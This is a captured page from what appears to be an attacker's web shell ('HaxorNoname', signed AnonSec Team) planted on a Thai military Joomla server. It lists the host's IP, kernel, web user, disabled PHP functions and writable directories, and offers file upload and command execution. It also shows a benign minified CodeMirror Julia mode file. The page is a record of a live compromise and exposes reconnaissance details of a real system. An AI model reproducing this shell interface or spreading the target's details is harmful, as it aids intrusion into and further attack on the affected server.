HaxorNoname
Server IP : 1.179.227.78  /  Your IP : 10.104.4.41
Web Server : Apache
System : Linux afdc-mdu34 5.4.0-153-generic #170-Ubuntu SMP Fri Jun 16 13:43:31 UTC 2023 x86_64
User : www ( 1001)
PHP Version : 7.4.30
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/afdc-mdu34.rtarf.mi.th/joomla/media/editors/codemirror/mode/julia/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /www/wwwroot/afdc-mdu34.rtarf.mi.th/joomla/media/editors/codemirror/mode/julia/julia.min.js
!(function(a){"object"==typeof exports&&"object"==typeof module?a(require("../../lib/codemirror")):"function"==typeof define&&define.amd?define(["../../lib/codemirror"],a):a(CodeMirror)})((function(a){"use strict";a.defineMode("julia",(function(b,c){function d(a,b){return void 0===b&&(b="\\b"),new RegExp("^(("+a.join(")|(")+"))"+b)}function e(a){return a.nestedArrays>0}function f(a){return a.nestedGenerators>0}function g(a,b){return void 0===b&&(b=0),a.scopes.length<=b?null:a.scopes[a.scopes.length-(b+1)]}function h(a,b){if(a.match(/^#=/,!1))return b.tokenize=k,b.tokenize(a,b);var c=b.leavingExpr;if(a.sol()&&(c=!1),b.leavingExpr=!1,c&&a.match(/^'+/))return"operator";if(a.match(/\.{4,}/))return"error";if(a.match(/\.{1,3}/))return"operator";if(a.eatSpace())return null;var d=a.peek();if("#"===d)return a.skipToEnd(),"comment";if("["===d&&(b.scopes.push("["),b.nestedArrays++),"("===d&&(b.scopes.push("("),b.nestedGenerators++),e(b)&&"]"===d){for(;b.scopes.length&&"["!==g(b);)b.scopes.pop();b.scopes.pop(),b.nestedArrays--,b.leavingExpr=!0}if(f(b)&&")"===d){for(;b.scopes.length&&"("!==g(b);)b.scopes.pop();b.scopes.pop(),b.nestedGenerators--,b.leavingExpr=!0}if(e(b)){if("end"==b.lastToken&&a.match(/^:/))return"operator";if(a.match(/^end/))return"number"}var h;if((h=a.match(v,!1))&&b.scopes.push(h[0]),a.match(w,!1)&&b.scopes.pop(),a.match(/^::(?![:\$])/))return b.tokenize=j,b.tokenize(a,b);if(!c&&a.match(A)||a.match(/:([<>]:|<<=?|>>>?=?|->|\/\/|\.{2,3}|[\.\\%*+\-<>!\/^|&]=?|[~\?\$])/))return"builtin";if(a.match(n))return"operator";if(a.match(/^\.?\d/,!1)){var q=RegExp(/^im\b/),r=!1;if(a.match(/^0x\.[0-9a-f_]+p[\+\-]?[_\d]+/i)&&(r=!0),a.match(/^0x[0-9a-f_]+/i)&&(r=!0),a.match(/^0b[01_]+/i)&&(r=!0),a.match(/^0o[0-7_]+/i)&&(r=!0),a.match(/^(?:(?:\d[_\d]*)?\.(?!\.)(?:\d[_\d]*)?|\d[_\d]*\.(?!\.)(?:\d[_\d]*))?([Eef][\+\-]?[_\d]+)?/i)&&(r=!0),a.match(/^\d[_\d]*(e[\+\-]?\d+)?/i)&&(r=!0),r)return a.match(q),b.leavingExpr=!0,"number"}if(a.match(/^'/))return b.tokenize=l,b.tokenize(a,b);if(a.match(B))return b.tokenize=m(a.current()),b.tokenize(a,b);if(a.match(z))return"meta";if(a.match(o))return null;if(a.match(x))return"keyword";if(a.match(y))return"builtin";var s=b.isDefinition||"function"==b.lastToken||"macro"==b.lastToken||"type"==b.lastToken||"struct"==b.lastToken||"immutable"==b.lastToken;return a.match(p)?s?"."===a.peek()?(b.isDefinition=!0,"variable"):(b.isDefinition=!1,"def"):a.match(/^({[^}]*})*\(/,!1)?(b.tokenize=i,b.tokenize(a,b)):(b.leavingExpr=!0,"variable"):(a.next(),"error")}function i(a,b){var c=a.match(/^(\(\s*)/);if(c&&(b.firstParenPos<0&&(b.firstParenPos=b.scopes.length),b.scopes.push("("),b.charsAdvanced+=c[1].length),"("==g(b)&&a.match(/^\)/)&&(b.scopes.pop(),b.charsAdvanced+=1,b.scopes.length<=b.firstParenPos)){var d=a.match(/^(\s*where\s+[^\s=]+)*\s*?=(?!=)/,!1);return a.backUp(b.charsAdvanced),b.firstParenPos=-1,b.charsAdvanced=0,b.tokenize=h,d?"def":"builtin"}if(a.match(/^$/g,!1)){for(a.backUp(b.charsAdvanced);b.scopes.length>b.firstParenPos;)b.scopes.pop();return b.firstParenPos=-1,b.charsAdvanced=0,b.tokenize=h,"builtin"}return b.charsAdvanced+=a.match(/^([^()]*)/)[1].length,b.tokenize(a,b)}function j(a,b){return a.match(/.*?(?=,|;|{|}|\(|\)|=|$|\s)/),a.match(/^{/)?b.nestedParameters++:a.match(/^}/)&&b.nestedParameters>0&&b.nestedParameters--,b.nestedParameters>0?a.match(/.*?(?={|})/)||a.next():0==b.nestedParameters&&(b.tokenize=h),"builtin"}function k(a,b){return a.match(/^#=/)&&b.nestedComments++,a.match(/.*?(?=(#=|=#))/)||a.skipToEnd(),a.match(/^=#/)&&0==--b.nestedComments&&(b.tokenize=h),"comment"}function l(a,b){var c,d=!1;if(a.match(q))d=!0;else if(c=a.match(/\\u([a-f0-9]{1,4})(?=')/i)){var e=parseInt(c[1],16);(e<=55295||e>=57344)&&(d=!0,a.next())}else if(c=a.match(/\\U([A-Fa-f0-9]{5,8})(?=')/)){var e=parseInt(c[1],16);e<=1114111&&(d=!0,a.next())}return d?(b.leavingExpr=!0,b.tokenize=h,"string"):(a.match(/^[^']+(?=')/)||a.skipToEnd(),a.match(/^'/)&&(b.tokenize=h),"error")}function m(a){function b(b,c){if(b.eat("\\"))b.next();else{if(b.match(a))return c.tokenize=h,c.leavingExpr=!0,"string";b.eat(/[`"]/)}return b.eatWhile(/[^\\`"]/),"string"}return'"""'===a.substr(-3)?a='"""':'"'===a.substr(-1)&&(a='"'),b}var n=c.operators||d(["[<>]:","[<>=]=","<<=?",">>>?=?","=>","->","\\/\\/","[\\\\%*+\\-<>!=\\/^|&\\u00F7\\u22BB]=?","\\?","\\$","~",":","\\u00D7","\\u2208","\\u2209","\\u220B","\\u220C","\\u2218","\\u221A","\\u221B","\\u2229","\\u222A","\\u2260","\\u2264","\\u2265","\\u2286","\\u2288","\\u228A","\\u22C5","\\b(in|isa)\\b(?!.?\\()"],""),o=c.delimiters||/^[;,()[\]{}]/,p=c.identifiers||/^[_A-Za-z\u00A1-\u2217\u2219-\uFFFF][\w\u00A1-\u2217\u2219-\uFFFF]*!*/,q=d(["\\\\[0-7]{1,3}","\\\\x[A-Fa-f0-9]{1,2}","\\\\[abefnrtv0%?'\"\\\\]","([^\\u0027\\u005C\\uD800-\\uDFFF]|[\\uD800-\\uDFFF][\\uDC00-\\uDFFF])"],"'"),r=["begin","function","type","struct","immutable","let","macro","for","while","quote","if","else","elseif","try","finally","catch","do"],s=["end","else","elseif","catch","finally"],t=["if","else","elseif","while","for","begin","let","end","do","try","catch","finally","return","break","continue","global","local","const","export","import","importall","using","function","where","macro","module","baremodule","struct","type","mutable","immutable","quote","typealias","abstract","primitive","bitstype"],u=["true","false","nothing","NaN","Inf"];a.registerHelper("hintWords","julia",t.concat(u));var v=d(r),w=d(s),x=d(t),y=d(u),z=/^@[_A-Za-z][\w]*/,A=/^:[_A-Za-z\u00A1-\uFFFF][\w\u00A1-\uFFFF]*!*/,B=/^(`|([_A-Za-z\u00A1-\uFFFF]*"("")?))/;return{startState:function(){return{tokenize:h,scopes:[],lastToken:null,leavingExpr:!1,isDefinition:!1,nestedArrays:0,nestedComments:0,nestedGenerators:0,nestedParameters:0,charsAdvanced:0,firstParenPos:-1}},token:function(a,b){var c=b.tokenize(a,b),d=a.current();return d&&c&&(b.lastToken=d),c},indent:function(a,c){var d=0;return("]"===c||")"===c||/^end/.test(c)||/^else/.test(c)||/^catch/.test(c)||/^elseif/.test(c)||/^finally/.test(c))&&(d=-1),(a.scopes.length+d)*b.indentUnit},electricInput:/\b(end|else|catch|finally)\b/,blockCommentStart:"#=",blockCommentEnd:"=#",lineComment:"#",closeBrackets:'()[]{}""',fold:"indent"}})),a.defineMIME("text/x-julia","julia")}));

Anon7 - 2022
AnonSec Team